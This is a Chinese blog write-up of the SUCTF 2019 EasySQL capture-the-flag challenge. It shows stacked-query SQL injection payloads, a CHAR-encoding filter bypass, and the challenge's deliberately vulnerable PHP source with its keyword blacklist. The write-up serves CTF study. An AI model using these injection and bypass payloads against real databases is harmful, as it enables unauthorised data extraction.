[SUCTF 2019]EasySQL

最新推荐文章于 2024-03-12 07:00:00 发布

coleak

最新推荐文章于 2024-03-12 07:00:00 发布

阅读量1.6k

点赞数 4

分类专栏： # mysql # web安全文章标签：数据库 sql mysql web安全网络安全

本文链接：https://blog.csdn.net/qq_63701832/article/details/128671515

版权

web安全同时被 2 个专栏收录

105 篇文章 4 订阅

订阅专栏

mysql

8 篇文章 1 订阅

订阅专栏

预先知识

环境

use mysql;
create table if not exists my_table(
id int PRIMARY key auto_increment,
name VARCHAR(20),
age int);
insert into my_table values(NULL,'xiao',19);
insert into my_table values(NULL,'coleak',20);
insert into my_table values(NULL,'ayue',23);
select * from my_table;
select * from my_table where name='';

实验

select n from my_table;回显n（n为数字）
select n||m from my_table;回显1(n,m不全为0)
select 'mm'||'kk' from my_table;回显为0

select age||0 from my_table;  回显111
select id||0 from my_table; 回显111

select name||0 from my_table;回显000

结论

MySQL里面的默认||，作用是先将两边的值类型强制转换为bool值类型，非0数字的bool值为1，字符串的bool值为0，和数字0的bool值一样都是0

信息收集

当输入为0或者字符时没有回显，当输入非0数字时回显为

Array
(
[0] => 1
)

输入2-1出现如上回显，初步判断是数字型注入，不需要引号闭合。

用bp跑一下字典看看过滤的关键词，很多函数都过滤了，通过exp进行报错注入时发现注入的长度也进行限制了，尝试堆叠注入。

注：预编译使用asc转码绕过时发现长度也超出了

SET @sql = concat(char(115,101,108,101,99,116)," * ",char(102,114,111,109)," my_table "); PREPARE aq from @sql; EXECUTE aq;
select * from my_table where name=char(97,121,117,101);

1;show databases;

Array ( [0] => 1 ) Array ( [0] => ctf ) Array ( [0] => ctftraining ) Array ( [0] => information_schema ) Array ( [0] => mysql ) Array ( [0] => performance_schema ) Array ( [0] => test )

flag可能在ctf数据库中；尝试读取表

1;show tables;

Array ( [0] => 1 ) Array ( [0] => Flag )

大概是ctf数据库里有两个表，分别是Flag和1。继续挖掘才发现flag被过滤了，连from都被过滤了......说好的Easysql呢？？？

思路

当输入为0或者字符时没有回显，当输入非0数字时回显为

Array
(
[0] => 1
)

大胆猜测，小心求证

select $post['query'] || 0 from Flag

传入*,0构造select *，0 || 0 from Flag 即：

select *，0 from Flag

拿到flag

Array ( [0] => flag{886ad6e5-51ad-4de4-ab85-02e9eda03e8c} [1] => 0 )

源码分析

<?php
    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

<?php

    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

?>

原语句是

$sql = "select ".$post['query']."||flag from Flag";

其实和我猜测的||0差不多，因为flag里面是个字符型，根据规则自动转化为bool类型的0

非预期解

payload=*,1

$sql = "select *,1||flag from Flag";

应该是出题人忘记过滤*了

预期解

payload=1;set sql_mode=pipes_as_concat;select 1

语句执行为

select 1;set sql_mode=pipes_as_concat;select 1||flag from Flag

注释：

set sql_mode=pipes_as_concat的作用是将||的作用由or变为拼接字符串

即最后执行了select concat(1flag) from Flag;

Array ( [0] => 1 ) Array ( [0] => 1flag{c84ec837-7321-4fdc-9118-81f4ce9cab12} )将结果2去掉前面的1后即可得到flag

补充

sql_mode常用值如下

ONLY_FULL_GROUP_BY:

对于GROUP BY聚合操作,如果在SELECT中的列,没有在GROUP BY中出现,那么这个SQL是不合法的,因为列不在GROUP BY从句中

NO_AUTO_VALUE_ON_ZERO:

该值影响自增长列的插入。默认设置下,插入0或NULL代表生成下一个自增长值。如果用户希望插入的值为0,而该列又是自增长的,那么这个选项就有用了。

STRICT_TRANS_TABLES:

在该模式下,如果一个值不能插入到一个事务表中,则中断当前的操作,对非事务表不做限制

NO_ZERO_IN_DATE:

在严格模式下,不允许日期和月份为零

NO_ZERO_DATE:

设置该值,mysql数据库不允许插入零日期,插入零日期会抛出错误而不是警告。

ERROR_FOR_DIVISION_BY_ZERO:

在INSERT或UPDATE过程中,如果数据被零除,则产生错误而非警告。如果未给出该模式,那么数据被零除时MySQL返回NULL

NO_AUTO_CREATE_USER:

禁止GRANT创建密码为空的用户

NO_ENGINE_SUBSTITUTION:

如果需要的存储引擎被禁用或未编译,那么抛出错误。不设置此值时,用默认的存储引擎替代,并抛出一个异常

PIPES_AS_CONCAT:

将"||"视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似

ANSI_QUOTES:

启用ANSI_QUOTES后,不能用双引号来引用字符串,因为它被解释为识别符

ORACLE的sql_mode设置等同:PIPES_AS_CONCAT, ANSI_QUOTES, IGNORE_SPACE, NO_KEY_OPTIONS, NO_TABLE_OPTIONS, NO_FIELD_OPTIONS, NO_AUTO_CREATE_USER.